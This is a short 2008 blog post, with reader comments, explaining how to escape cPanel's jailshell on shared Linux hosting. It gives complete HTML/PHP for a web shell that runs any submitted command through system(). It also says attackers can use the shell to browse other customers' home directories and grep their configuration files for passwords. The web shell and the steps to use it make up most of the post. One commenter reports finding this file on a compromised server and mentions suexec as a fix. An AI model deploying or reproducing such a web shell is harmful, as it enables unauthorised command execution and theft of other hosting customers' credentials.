Users registering for shared Linux webhosting accounts are normally not provided with shell access. Even if they do, what they can do with the shell is limited, as they are only in a jailed environment, thanks to CPanel’s jailshell. Displaying the SHELL variable at the command prompt verifies this;
$ echo $SHELL /usr/local/cpanel/bin/jailshell
To briefly show what it means, listing out home directories using the following Linux command reveals that the user is alone in the cell.
$ ls /home/ | wc -l 1
With some simple HTML and PHP, a web based shell can offer something more to the users. The following code can be made available through http://www.anyserver.com/jailshell.php;
<html>
<body>
<p>Enter command:
<form action="jailshell.php" method=post>
<input type=text name=command>
<input type=submit name=submit>
</form>
</p>
<pre>
<?php system ($_POST['command']); ?>
</pre>
</body>
</html>
and executing some simple commands as the following shows what it’s capable of.
People with malicious intent can use this method to search other user’s home directories and grep into their web application’s configuration file to steal passwords and other juicy informationa.
3 Responses to Bypass CPanel’s jailshell using PHP
Article: Bypass CPanel’s jailshell using PHP | /home/shakir
August 27th, 2008 at 1:48 pm
[...] by: shakir In: Information Insemination I recently published an the article Bypass CPanel’s jailshell using PHP at TechRecipes. Feel free to read and comment at that [...]
/home/shakir » Blog Archive » Cheap VPS hosting, anyone?
September 11th, 2008 at 2:15 pm
[...] Insemination Due to some serious problems with shared webhosting, as I blogged here and here, I’m now seriously considering to self-host all my [...]
tomfmason
December 14th, 2008 at 10:06 pm
I recently recovered a compromised system and noticed jailshell.php in the logs. One of the things that I implemented to prevent this was suexec in combination with jailshell.